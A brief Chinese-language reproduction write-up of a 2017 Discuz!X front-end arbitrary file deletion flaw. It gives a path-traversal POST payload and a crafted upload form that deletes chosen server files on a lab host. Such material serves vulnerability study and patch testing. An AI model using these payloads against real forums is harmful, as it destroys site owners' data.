Discuz!X前臺任意文件刪除漏洞重現

漏洞背景：
Discuz!X社區軟件，是一個采用 PHP 和 MySQL 等其他多種數據庫構建的性能優異、功能全面、安全穩定的社區論壇平臺。

2017年9月29日，Discuz!修復了一個安全問題用于加強安全性，這個漏洞會導致前臺用戶可以導致任意刪除文件漏洞。

2017年9月29日，知道創宇404 實驗室開始應急，經過知道創宇404實驗室分析確認，該漏洞于2014年6月被提交到 Wooyun漏洞平臺，Seebug漏洞平臺收錄了該漏洞，漏洞編號 ssvid-93588。該漏洞通過配置屬性值，導致任意文件刪除。

經過分析確認，原有的利用方式已經被修復，添加了對屬性的 formtype 判斷，但修復方式不完全導致可以繞過，通過模擬文件上傳可以進入其他 unlink 條件，實現任意文件刪除漏洞。

漏洞復現：
1.進入設置-個人資料，先在頁面源代碼找到formhash值，可以看到值為2599b5e5

2.開啟一個插件Hackbar
Post數據：birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5

執行后會顯示一片空白，你再刷新下或重新訪問下就好了。


3.出生地被修改成要刪除的文件。
最后構造表單執行刪除文件
<form
action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="720c16c3"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>

生成.html，上面的需要自己修改。
4.然后隨便上傳一張圖片，就能刪除自己要刪除的。

5.再訪問回去看一下。

復現成功。